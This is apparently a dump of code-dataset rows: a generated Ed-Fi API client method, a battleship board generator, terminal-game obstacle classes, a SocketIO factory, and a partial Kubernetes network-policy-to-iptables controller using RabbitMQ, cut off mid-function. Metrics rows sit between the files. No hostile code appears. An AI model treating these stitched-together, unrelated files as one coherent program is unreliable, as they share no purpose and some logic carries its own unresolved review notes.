        '/ed-fi/assessmentItems', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def put_assessment_item(self, id, assessment_item, **kwargs):  # noqa: E501
    """Update an "assessmentItem" resource by identifier.  # noqa: E501

    PUT replaces the resource identified by `id`; an "id" in the JSON
    body is ignored. This resource is not configured for cascading
    natural key updates, so natural key values are not modified — POST
    is the recommended operation for upserts. Synchronous by default;
    pass async_req=True to get a request thread instead.

    >>> thread = api.put_assessment_item(id, assessment_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: A resource identifier that uniquely identifies the resource. (required)
    :param EdFiAssessmentItem assessment_item: The JSON representation of the "assessmentItem" resource to be created or updated. (required)
    :param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Async and sync calls alike forward to the _with_http_info variant
    # and return its result (thread or data), so no branching is needed.
    kwargs['_return_http_data_only'] = True
    return self.put_assessment_item_with_http_info(id, assessment_item, **kwargs)  # noqa: E501
def put_assessment_item_with_http_info(self, id, assessment_item, **kwargs):  # noqa: E501
    """Updates a resource based on the resource identifier.  # noqa: E501

    The PUT operation is used to update a resource by identifier. If the resource identifier (\"id\") is provided in the JSON body, it will be ignored. Additionally, this API resource is not configured for cascading natural key updates. Natural key values for this resource cannot be changed using PUT operation and will not be modified in the database, and so recommendation is to use POST as that supports upsert behavior.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.put_assessment_item_with_http_info(id, assessment_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: A resource identifier that uniquely identifies the resource. (required)
    :param EdFiAssessmentItem assessment_item: The JSON representation of the \"assessmentItem\" resource to be created or updated. (required)
    :param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Endpoint parameters plus the generic request options every
    # generated method accepts.
    all_params = ['id', 'assessment_item', 'if_match']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # locals() snapshots self + the explicit arguments; validated kwargs
    # are merged in so everything below reads from one dict. This line
    # must stay exactly here — it captures the names defined above.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method put_assessment_item" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in params or
                                                   params['id'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `id` when calling `put_assessment_item`")  # noqa: E501
    # verify the required parameter 'assessment_item' is set
    if self.api_client.client_side_validation and ('assessment_item' not in params or
                                                   params['assessment_item'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `assessment_item` when calling `put_assessment_item`")  # noqa: E501

    collection_formats = {}

    # The identifier is substituted into the `{id}` segment of the path.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    header_params = {}
    # Optimistic-concurrency guard, forwarded as the If-Match ETag header.
    if 'if_match' in params:
        header_params['If-Match'] = params['if_match']  # noqa: E501

    form_params = []
    local_var_files = {}

    # The resource JSON travels as the request body.
    body_params = None
    if 'assessment_item' in params:
        body_params = params['assessment_item']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2_client_credentials']  # noqa: E501

    return self.api_client.call_api(
        '/ed-fi/assessmentItems/{id}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 55.722368
| 578
| 0.65619
| 5,193
| 42,349
| 5.157327
| 0.073946
| 0.042118
| 0.018445
| 0.01613
| 0.925958
| 0.902584
| 0.888694
| 0.876298
| 0.866814
| 0.865581
| 0
| 0.01599
| 0.264564
| 42,349
| 759
| 579
| 55.795784
| 0.843924
| 0.4172
| 0
| 0.708434
| 0
| 0.031325
| 0.268422
| 0.07853
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031325
| false
| 0
| 0.009639
| 0
| 0.086747
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cae1f4f412cb6799873638b2cc8b50a30171df8
| 4,113
|
py
|
Python
|
ship_gen.py
|
the-bald-lad/Battle-Ships
|
8c5a2377934ceb3a55fcf06aec0f8512b5954234
|
[
"MIT"
] | 1
|
2021-12-16T17:27:14.000Z
|
2021-12-16T17:27:14.000Z
|
ship_gen.py
|
the-bald-lad/Battle-Ships
|
8c5a2377934ceb3a55fcf06aec0f8512b5954234
|
[
"MIT"
] | null | null | null |
ship_gen.py
|
the-bald-lad/Battle-Ships
|
8c5a2377934ceb3a55fcf06aec0f8512b5954234
|
[
"MIT"
] | null | null | null |
import csv
import random
# 1x2, 2x3, 1x4, 1x5
row_num = col_num = 10
map_list = [[0 for i in range(row_num)] for i in range(col_num)]
def aaaaa():
    """Return the module-level board grid (list of row lists) that the
    boat* placement helpers mutate in place."""
    return map_list
def boat2(map_list):
    """Place the single 1x2 ship on the board, marking its cells with "@".

    Fix over the original: the old code re-rolled the anchor at most once
    when it landed on an occupied cell and then stamped the ship anyway,
    so it could overwrite an existing ship — and it never checked the
    ship's second cell at all. Now it retries until both cells are free,
    matching the behavior of boat3/boat4/boat5.

    :param map_list: mutable 2D grid (row-major) of size row_num x col_num
    """
    # Orientation is chosen once: 1 = horizontal, 2 = vertical.
    orientation = random.randint(1, 2)
    while True:
        r1 = random.randint(0, col_num - 2)
        r2 = random.randint(0, row_num - 2)
        if orientation == 1:
            cells = [(r1, r2), (r1, r2 + 1)]
        else:
            cells = [(r1, r2), (r1 + 1, r2)]
        # Only place the ship when every cell it covers is open water.
        if all(map_list[row][col] != "@" for row, col in cells):
            for row, col in cells:
                map_list[row][col] = "@"
            return
def boat3(map_list):
    """Place one 1x3 ship: keep rolling a random anchor until all three
    cells are open water, then mark them with "@"."""
    # Orientation picked once up front: 1 = horizontal, otherwise vertical.
    horizontal = random.randint(1, 2) == 1
    while True:
        r1 = random.randint(0, col_num - 3)
        r2 = random.randint(0, row_num - 3)
        if horizontal:
            cells = [(r1, r2 + k) for k in range(3)]
        else:
            cells = [(r1 + k, r2) for k in range(3)]
        if all(map_list[row][col] != "@" for row, col in cells):
            for row, col in cells:
                map_list[row][col] = "@"
            return
def boat4(map_list):
    """Place the 1x4 ship: keep rolling a random anchor until all four
    cells are open water, then mark them with "@"."""
    # Orientation picked once up front: 1 = horizontal, otherwise vertical.
    horizontal = random.randint(1, 2) == 1
    while True:
        r1 = random.randint(0, col_num - 4)
        r2 = random.randint(0, row_num - 4)
        if horizontal:
            cells = [(r1, r2 + k) for k in range(4)]
        else:
            cells = [(r1 + k, r2) for k in range(4)]
        if all(map_list[row][col] != "@" for row, col in cells):
            for row, col in cells:
                map_list[row][col] = "@"
            return
def boat5(map_list):
    """Place the 1x5 ship: keep rolling a random anchor until all five
    cells are open water, then mark them with "@"."""
    # Orientation picked once up front: 1 = horizontal, otherwise vertical.
    horizontal = random.randint(1, 2) == 1
    while True:
        r1 = random.randint(0, col_num - 5)
        r2 = random.randint(0, row_num - 5)
        if horizontal:
            cells = [(r1, r2 + k) for k in range(5)]
        else:
            cells = [(r1 + k, r2) for k in range(5)]
        if all(map_list[row][col] != "@" for row, col in cells):
            for row, col in cells:
                map_list[row][col] = "@"
            return
def ships():
    """Place the whole fleet, persist the board to CSV, and return a
    printable emoji rendering of it.

    Side effects: mutates the module-level ``map_list`` and rewrites
    ``table2.csv`` (raw board) and ``table.csv`` (emoji board).

    Fix over the original: the files are now opened with ``newline=""``
    (required by the csv module — otherwise blank rows appear on
    Windows) and an explicit ``encoding="utf-8"`` so the emoji writes
    cannot fail on platforms whose default encoding can't encode them.

    :return: the board as a newline-separated string of space-joined cells
    """
    boat2(map_list)
    boat3(map_list)
    boat3(map_list)
    boat4(map_list)
    boat5(map_list)
    with open("table2.csv", "w", newline="", encoding="utf-8") as raw_file:
        writer = csv.writer(raw_file)
        for row in map_list:
            writer.writerow(row)
    with open("table.csv", "w", newline="", encoding="utf-8") as emoji_file:
        writer = csv.writer(emoji_file)
        for row in map_list:
            if "@" in row:
                rendered = ""
                for cell in row:
                    rendered += "🚢" if cell == "@" else "🌊"
                # NOTE: writerow over a string emits one field per
                # character — that is what the reader below expects.
                writer.writerow(rendered)
            else:
                writer.writerow("🌊" * col_num)
    board = ""
    with open("table.csv", newline="", encoding="utf-8") as csvfile:
        for row in csv.reader(csvfile):
            board = board + " ".join(row)
            board = board + "\n"
    return board
| 23.237288
| 64
| 0.463409
| 616
| 4,113
| 2.956169
| 0.099026
| 0.272927
| 0.286656
| 0.229544
| 0.78693
| 0.755629
| 0.704009
| 0.691378
| 0.689182
| 0.687534
| 0
| 0.08269
| 0.338439
| 4,113
| 177
| 65
| 23.237288
| 0.585447
| 0.004376
| 0
| 0.742331
| 0
| 0
| 0.023449
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03681
| false
| 0.147239
| 0.01227
| 0.006135
| 0.06135
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
2ccdc0a3b62091900d2e0c6ef345b670ebeb1ac6
| 8,938
|
py
|
Python
|
codes/obstacle.py
|
veeral-agarwal/DASSignment4
|
200c5ee5059fc42f4801ffdbca842a4fa0d5e9cd
|
[
"MIT"
] | null | null | null |
codes/obstacle.py
|
veeral-agarwal/DASSignment4
|
200c5ee5059fc42f4801ffdbca842a4fa0d5e9cd
|
[
"MIT"
] | null | null | null |
codes/obstacle.py
|
veeral-agarwal/DASSignment4
|
200c5ee5059fc42f4801ffdbca842a4fa0d5e9cd
|
[
"MIT"
] | null | null | null |
import random
import colorama as col
import numpy as np
dimx = 10000
dimy = 62
col.init()
class obstacle:
    """Base class for everything the player can collide with.

    Tracks a position, a list of display glyphs, and whether the
    obstacle has already been hit.
    """

    def __init__(self, x, y):
        self.__x = x
        self.__y = y
        self.__shape = []      # display glyphs; emptied when destroyed
        self.__hit = False     # set once the obstacle has been hit
        self.__penalty = 10    # cost charged on collision
        self.__score = 15      # reward for destroying it

    def destroy(self):
        """Flag the obstacle as hit and drop its glyphs so it no longer draws."""
        self.__hit = True
        self.__shape = []
class zapper_horizontal(obstacle):
    """A horizontal zapper: a row of 15 "-" glyphs, white at both ends
    and red in between, drawn left-to-right at a fixed row."""

    def __init__(self, x, y):
        super().__init__(x, y)
        white_dash = col.Fore.WHITE + "-" + col.Fore.RESET
        red_dash = col.Fore.RED + "-" + col.Fore.RESET
        # Same 15-cell pattern as before: one white cap on each side.
        self.__shape = [white_dash] + [red_dash] * 13 + [white_dash]
        self.__x = x
        self.__y = y

    def place(self):
        """Draw the zapper glyph-by-glyph via ANSI cursor positioning."""
        for offset, glyph in enumerate(self.__shape):
            print(f"\033[{self.__y};{self.__x + offset}H", end="")
            print(glyph, end="")
        # Park the cursor at the bottom of the play field.
        print(f"\033[{dimy};1H")

    def remove(self):
        """Erase the zapper by overwriting each of its cells with a space."""
        for offset in range(len(self.__shape)):
            print(f"\033[{self.__y};{self.__x + offset}H", end="")
            print(" ", end="")
        print(f"\033[{dimy};1H")

    def update(self, check=1):
        """Scroll left by `check`; return True once the left edge is reached."""
        if self.__x > 2:
            self.__x -= check
        else:
            return True

    def position(self):
        """Return the current [x, y] anchor."""
        return [self.__x, self.__y]
class zapper_verticle(obstacle):
    """A vertical zapper: a column of 9 "|" glyphs, white at both ends
    and red in between, drawn top-to-bottom at a fixed column."""

    def __init__(self, x, y):
        super().__init__(x, y)
        white_bar = col.Fore.WHITE + "|" + col.Fore.RESET
        red_bar = col.Fore.RED + "|" + col.Fore.RESET
        # Same 9-cell pattern as before: one white cap on each end.
        self.__shape = [white_bar] + [red_bar] * 7 + [white_bar]
        self.__x = x
        self.__y = y

    def place(self):
        """Draw the zapper one glyph per row via ANSI cursor positioning."""
        for offset, glyph in enumerate(self.__shape):
            print(f"\033[{self.__y + offset};{self.__x}H", end="")
            print(glyph, end="")
        # Park the cursor at the bottom of the play field.
        print(f"\033[{dimy};1H")

    def remove(self):
        """Erase the zapper by overwriting each of its cells with a space."""
        for offset in range(len(self.__shape)):
            print(f"\033[{self.__y + offset};{self.__x}H", end="")
            print(" ", end="")
        print(f"\033[{dimy};1H")

    def update(self, check=1):
        """Scroll left by `check`; return True once the left edge is reached."""
        if self.__x > 2:
            self.__x -= check
        else:
            return True

    def position(self):
        """Return the current [x, y] anchor (top of the bar)."""
        return [self.__x, self.__y]
class zapper_cross(obstacle):
    """A diagonal zapper: 6 backslash glyphs running down-and-right,
    white at both ends and red in between."""

    def __init__(self, x, y):
        super().__init__(x, y)
        white_slash = col.Fore.WHITE + "\\" + col.Fore.RESET
        red_slash = col.Fore.RED + "\\" + col.Fore.RESET
        # Same 6-cell pattern as before: one white cap on each end.
        self.__shape = [white_slash] + [red_slash] * 4 + [white_slash]
        self.__x = x
        self.__y = y

    def place(self):
        """Draw along the diagonal: each glyph sits one row and one column on."""
        for step, glyph in enumerate(self.__shape):
            print(f"\033[{self.__y + step};{self.__x + step}H", end="")
            print(glyph, end="")
        # Park the cursor at the bottom of the play field.
        print(f"\033[{dimy};1H")

    def remove(self):
        """Erase the zapper by overwriting each of its cells with a space."""
        for step in range(len(self.__shape)):
            print(f"\033[{self.__y + step};{self.__x + step}H", end="")
            print(" ", end="")
        print(f"\033[{dimy};1H")

    def update(self, check=1):
        """Scroll left by `check`; return True once the left edge is reached."""
        if self.__x > 2:
            self.__x -= check
        else:
            return True

    def position(self):
        """Return the current [x, y] anchor (top of the diagonal)."""
        return [self.__x, self.__y]
class magnet(obstacle):
    """A horizontal magnet rendered as | | = M = | |, drawn
    left-to-right at a fixed row."""

    def __init__(self, x, y):
        super().__init__(x, y)
        # Exact same glyph strings as before, just named: note the poles
        # end in Fore.WHITE and the core in Fore.RED (not RESET).
        bar = col.Fore.WHITE + "|" + col.Fore.RESET
        pole = col.Fore.LIGHTWHITE_EX + "=" + col.Fore.WHITE
        core = col.Fore.RED + "M" + col.Fore.RED
        self.__shape = [bar, bar, pole, core, pole, bar, bar]
        self.__x = x
        self.__y = y

    def place(self):
        """Draw the magnet glyph-by-glyph via ANSI cursor positioning."""
        for offset, glyph in enumerate(self.__shape):
            print(f"\033[{self.__y};{self.__x + offset}H", end="")
            print(glyph, end="")
        # Park the cursor at the bottom of the play field.
        print(f"\033[{dimy};1H")

    def remove(self):
        """Erase the magnet by overwriting each of its cells with a space."""
        for offset in range(len(self.__shape)):
            print(f"\033[{self.__y};{self.__x + offset}H", end="")
            print(" ", end="")
        print(f"\033[{dimy};1H")

    def update(self, check=1):
        """Scroll left by `check`; return True once the left edge is reached."""
        if self.__x > 2:
            self.__x -= check
        else:
            return True

    def position(self):
        """Return the current [x, y] anchor."""
        return [self.__x, self.__y]
class boss(obstacle):
    # The dragon boss. Its glyphs and their absolute screen coordinates
    # are loaded from the "./drag" ASCII-art file; movement is tracked in
    # a numpy coordinate array rather than a single (x, y) anchor.
    def __init__(self, x, y):
        super().__init__(x, y)
        shape = []
        coord = []
        # Every non-space character in ./drag becomes one glyph; its
        # screen position is the file position offset by the spawn (x, y).
        with open("./drag") as obj:
            i = 0
            for line in obj:
                for j in range(len(line)):
                    if line[j] != ' ':
                        shape.append(line[j])
                        coord.append([i+x, j+y])
                i += 1
        self.__shape = shape
        self.__coord = np.array(coord)  # shape (n_glyphs, 2): [row, col]
        self.__x = x
        self.__y = y
        self.__lives = 9  # hit points; decremented by shot()

    def place(self):
        """Draw each glyph at its stored absolute coordinate, then park
        the cursor at the bottom of the play field."""
        x = self.__x
        y = self.__y
        shape = self.__shape
        coord = self.__coord
        tempx = -1
        for i in shape:
            tempx += 1
            print("\033["+str(coord[tempx][0])+";"+str(coord[tempx][1])+"H", end="")
            print(i, end="")
        print("\033["+str(dimy)+";1H")

    def remove(self):
        """Erase the boss by overwriting each glyph cell with a space."""
        x = self.__x
        y = self.__y
        shape = self.__shape
        coord = self.__coord
        tempx = -1
        for i in shape:
            tempx += 1
            print("\033["+str(coord[tempx][0])+";"+str(coord[tempx][1])+"H", end="")
            print(" ", end="")
        print("\033["+str(dimy)+";1H")

    def update(self, coordinates):
        """Track the target vertically: stay put when exactly 11 rows
        apart, shift the whole glyph set up when closer (bounded at row
        3), otherwise shift it down (bounded at row 46). Always returns
        True.

        NOTE(review): the final elif tests > -11, which also holds for
        most positive gaps, so the "move down" branch dominates whenever
        the earlier branches fall through — confirm this is intended.
        """
        coord = self.__coord
        if(coordinates[1]-coord[0][0] == 11):
            return True
        elif (coordinates[1]-coord[0][0] < 11):
            if self.__coord[0, 0] > 3:
                self.__coord[:, 0] = self.__coord[:, 0]-1
            return True
        elif (coordinates[1]-coord[0][0] > -11):
            if self.__coord[0, 0] < 46:
                self.__coord[:, 0] = self.__coord[:, 0]+1
            return True
        return True

    def position(self):
        # Spawn-point anchor, not the live coordinate array.
        coordinates = [self.__x, self.__y]
        return coordinates

    def lives(self):
        """Render "BOSS : n" near the top-right (column 80+); once lives
        go negative, blank that HUD area instead."""
        if self.__lives >= 0:
            shape = ["B", "O", "S", "S", " ", ":", " ", str(self.__lives)]
            tempx = -1
            for i in shape:
                tempx += 1
                print("\033["+str(1)+";"+str(80+tempx)+"H", end="")
                print(i, end="")
            print("\033["+str(dimy)+";1H")
        else:
            shape = [" ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " "]
            tempx = -1
            for i in shape:
                tempx += 1
                print("\033["+str(1)+";"+str(80+tempx)+"H", end="")
                print(i, end="")
            print("\033["+str(dimy)+";1H")

    def shot(self):
        # One hit taken.
        self.__lives -= 1

    def dead(self):
        """Return True once all lives are exhausted."""
        if self.__lives <= 0:
            return True
        return False
class ball(obstacle):
    """A two-glyph projectile ("<" then "=") that travels right-to-left."""

    def __init__(self, x, y):
        # Deliberately does not call obstacle.__init__ (as in the
        # original): only position and shape are tracked.
        self.__x = x
        self.__y = y
        self.__shape = ["<", "="]

    def place(self):
        """Draw the projectile glyph-by-glyph via ANSI cursor positioning."""
        for offset, glyph in enumerate(self.__shape):
            print(f"\033[{self.__y};{self.__x + offset}H", end="")
            print(glyph, end="")
        # Park the cursor at the bottom of the play field.
        print(f"\033[{dimy};1H")

    def remove(self):
        """Erase the projectile by overwriting each cell with a space."""
        for offset in range(len(self.__shape)):
            print(f"\033[{self.__y};{self.__x + offset}H", end="")
            print(" ", end="")
        print(f"\033[{dimy};1H")

    def update(self, check=1):
        """Move left by `check`; return True once the left edge is reached."""
        if self.__x > 2:
            self.__x -= check
        else:
            return True

    def position(self):
        """Return the current [x, y] anchor."""
        return [self.__x, self.__y]
| 31.583039
| 105
| 0.479078
| 1,168
| 8,938
| 3.451199
| 0.075342
| 0.128504
| 0.101216
| 0.111635
| 0.886877
| 0.876457
| 0.871248
| 0.848177
| 0.848177
| 0.818159
| 0
| 0.032025
| 0.332737
| 8,938
| 283
| 106
| 31.583039
| 0.643863
| 0
| 0
| 0.769784
| 0
| 0
| 0.031995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125899
| false
| 0
| 0.010791
| 0
| 0.223022
| 0.151079
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
391b112fa6767a2ccb2a9eba4139c6c272d19f36
| 145
|
py
|
Python
|
backend/workers/socket.py
|
Techyhans/coco-annotator
|
e4ceaa551ce6397d33ab6602b08db32c855ebbfd
|
[
"MIT"
] | 1,584
|
2018-09-03T21:40:32.000Z
|
2022-03-24T23:43:28.000Z
|
backend/workers/socket.py
|
kaankrblt1/coco-annotator-tests
|
55ad0d08b2bc0f616357ec0001c5c6d5e0d4e2ae
|
[
"MIT"
] | 458
|
2018-09-04T03:15:00.000Z
|
2022-03-31T11:53:37.000Z
|
backend/workers/socket.py
|
kaankrblt1/coco-annotator-tests
|
55ad0d08b2bc0f616357ec0001c5c6d5e0d4e2ae
|
[
"MIT"
] | 415
|
2018-10-13T12:34:40.000Z
|
2022-03-28T14:57:07.000Z
|
from config import Config
from flask_socketio import SocketIO
def create_socket():
    """Return a SocketIO instance that publishes through the configured
    Celery broker (Config.CELERY_BROKER_URL) as its message queue."""
    return SocketIO(message_queue=Config.CELERY_BROKER_URL)
| 20.714286
| 59
| 0.827586
| 20
| 145
| 5.75
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124138
| 145
| 6
| 60
| 24.166667
| 0.905512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
39223879616bbfeeb23aeebf0017da2809527cdd
| 36,036
|
py
|
Python
|
network_policy_controller.py
|
rushabh268/kubernetes-network-policy-controller
|
6c3b6c8565a5e5459f1e92fdac754cccf3b98176
|
[
"Apache-2.0"
] | 2
|
2018-01-24T21:31:31.000Z
|
2018-03-20T20:19:23.000Z
|
network_policy_controller.py
|
rushabh268/kubernetes-network-policy-controller
|
6c3b6c8565a5e5459f1e92fdac754cccf3b98176
|
[
"Apache-2.0"
] | null | null | null |
network_policy_controller.py
|
rushabh268/kubernetes-network-policy-controller
|
6c3b6c8565a5e5459f1e92fdac754cccf3b98176
|
[
"Apache-2.0"
] | 2
|
2021-06-06T13:13:27.000Z
|
2021-06-16T16:32:19.000Z
|
from kubernetes import client, config, watch
import kubernetes
import time
from tornado.ioloop import IOLoop
from tornado import gen
import pika
import sys
def send_policy_to_node(node_name, iptables):
    """Publish an iptables rule set to a node's topic via RabbitMQ.

    node_name -- routing key of the target node; None falls back to the
                 generic 'iptables.info' topic.
    iptables  -- iterable of iptables command strings (joined into one
                 message body); empty input sends 'No action!'.

    Fixes over the original: `is not None` instead of `!= None`
    (PEP 8), and the connection is closed in a finally block so it is
    not leaked when exchange_declare/basic_publish raises.
    """
    # To-Do: Add check for rabbitmq status before sending the message
    connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
    try:
        channel = connection.channel()
        channel.exchange_declare(exchange='topic_logs', exchange_type='topic')
        routing_key = node_name if node_name is not None else 'iptables.info'
        message = ''.join(iptables) or 'No action!'
        channel.basic_publish(exchange='topic_logs', routing_key=routing_key, body=message)
        print(" [x] Sent %r:%r" % (routing_key, message))
    finally:
        # Always release the broker connection, even on publish failure.
        connection.close()
def create_new_policy_rules(network_policy, uid, callback):
    """Translate one parsed NetworkPolicy (network_policy[uid]) into
    iptables rule lists and hand the result to `callback`.

    Classifies the policy as a concrete 'network_policy' or one of the
    default allow/deny variants based on podSelector and policyTypes,
    builds the matching iptables commands, then calls
    callback(policy_list).
    """
    print 'Checking policy contents to add iptables based rules'
    policy_info = {}
    # Remember the policy's namespace when the metadata carries one.
    if 'metadata' in network_policy[uid]:
        if 'namespace' in network_policy[uid]['metadata']:
            policy_info['namespace'] = network_policy[uid]['metadata']['namespace']
    #Determing default deny or default allow policies for Ingress and Egress
    if network_policy[uid]['spec']['podSelector'] != {}:
        if 'policyTypes' in network_policy[uid]['spec']:
            if len(network_policy[uid]['spec']['policyTypes']) == 2:
                if network_policy[uid]['spec']['policyTypes'] == ['Ingress', 'Egress']:
                    if 'podSelector' in network_policy[uid]['spec']:
                        if network_policy[uid]['spec']['podSelector'] == {}:
                            policy_info['policy_type'] = 'default_deny_for_ingress_and_egress'
                        else:
                            policy_info['policy_type'] = 'network_policy'
            elif len(network_policy[uid]['spec']['policyTypes']) == 1:
                # NOTE(review): policyTypes is compared against bare
                # strings here (not one-element lists); the list forms
                # are handled in the outer elif branches below — confirm
                # these string comparisons can ever match.
                if network_policy[uid]['spec']['policyTypes'] == 'Ingress':
                    if 'podSelector' in network_policy[uid]['spec']:
                        if network_policy[uid]['spec']['podSelector'] == {}:
                            policy_info['policy_type'] = 'default_deny_for_ingress'
                        else:
                            policy_info['policy_type'] = 'network_policy'
                elif network_policy[uid]['spec']['policyTypes'] == 'Egress':
                    if 'podSelector' in network_policy[uid]['spec']:
                        if network_policy[uid]['spec']['podSelector'] == {}:
                            policy_info['policy_type'] = 'default_deny_for_egress'
                        else:
                            policy_info['policy_type'] = 'network_policy'
                else:
                    # An empty ingress/egress stanza ([{}]) means "allow all".
                    if 'ingress' in network_policy[uid]['spec']:
                        if network_policy[uid]['spec']['ingress'] == [{}]:
                            if network_policy[uid]['spec']['podSelector'] == {}:
                                policy_info['policy_type'] = 'default_allow_for_ingress'
                    elif 'egress' in network_policy[uid]['spec']:
                        if network_policy[uid]['spec']['egress'] == [{}]:
                            if network_policy[uid]['spec']['podSelector'] == {}:
                                policy_info['policy_type'] = 'default_allow_for_egress'
    elif len(network_policy[uid]['spec']['policyTypes']) == 1:
        # Empty podSelector: a default-deny policy scoped by policyTypes.
        if network_policy[uid]['spec']['policyTypes'] == ['Ingress']:
            if 'podSelector' in network_policy[uid]['spec']:
                if network_policy[uid]['spec']['podSelector'] == {}:
                    policy_info['policy_type'] = 'default_deny_for_ingress'
                else:
                    policy_info['policy_type'] = 'network_policy'
        elif network_policy[uid]['spec']['policyTypes'] == ['Egress']:
            if 'podSelector' in network_policy[uid]['spec']:
                if network_policy[uid]['spec']['podSelector'] == {}:
                    policy_info['policy_type'] = 'default_deny_for_egress'
                else:
                    policy_info['policy_type'] = 'network_policy'
    elif len(network_policy[uid]['spec']['policyTypes']) == 2:
        if network_policy[uid]['spec']['policyTypes'] == ['Ingress', 'Egress']:
            if 'podSelector' in network_policy[uid]['spec']:
                if network_policy[uid]['spec']['podSelector'] == {}:
                    policy_info['policy_type'] = 'default_deny_for_ingress_and_egress'
                else:
                    policy_info['policy_type'] = 'network_policy'
    #Parse Network policy ports and labels
    # NOTE(review): policy_info['policy_type'] stays unset if none of the
    # branches above matched; the lookups below would then raise KeyError.
    if policy_info['policy_type'] == 'network_policy':
        ingress_egress_info = get_ingress_egress_policy_info(network_policy, uid)
        if 'podSelector' in network_policy[uid]['spec']:
            if 'matchLabels' in network_policy[uid]['spec']['podSelector']:
                policy_info['pod_selector_labels'] = network_policy[uid]['spec']['podSelector']['matchLabels']
    policy_list = {}
    policy_list_ingress = {}
    policy_list_egress = {}
    # Dispatch on the classified policy type to build the iptables commands.
    if policy_info['policy_type'] == 'network_policy':
        print "Network policy has both ingress and egress"
        policy_list_ingress = create_ingress_iptable_rules(ingress_egress_info['ingress'], policy_info)
        policy_list_egress = create_egress_iptable_rules(ingress_egress_info['egress'], policy_info)
    elif policy_info['policy_type'] == 'default_allow_for_ingress':
        print "Network policy is default allow for Ingress"
        policy_list = create_default_allow_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
    elif policy_info['policy_type'] == 'default_allow_for_egress':
        print "network policy is default allow for egress"
        policy_list = create_default_allow_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
    elif policy_info['policy_type'] == 'default_deny_for_ingress':
        policy_list = create_default_deny_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
    elif policy_info['policy_type'] == 'default_deny_for_egress':
        policy_list = create_default_deny_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
    elif policy_info['policy_type'] == 'default_deny_for_ingress_and_egress':
        policy_list = create_default_ingress_egress_deny_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
    #print policy_list
    # NOTE(review): in the 'network_policy' case the ingress/egress lists
    # are built but policy_list is still empty when handed to the
    # callback — confirm whether they should be merged in.
    callback(policy_list)
def create_ingress_iptable_rules(ingress_info, policy_info):
print ingress_info, policy_info
policy_list = {}
pod_arr = []
if policy_info['policy_type'] == 'network_policy':
if 'pod_labels' in ingress_info:
if 'namespace' in policy_info:
if policy_info['namespace'] != ' ':
pod_arr = get_ingress_nodes_of_pods_pod_selector(policy_info['namespace'], ingress_info['pod_labels'])
dest_pod_arr = []
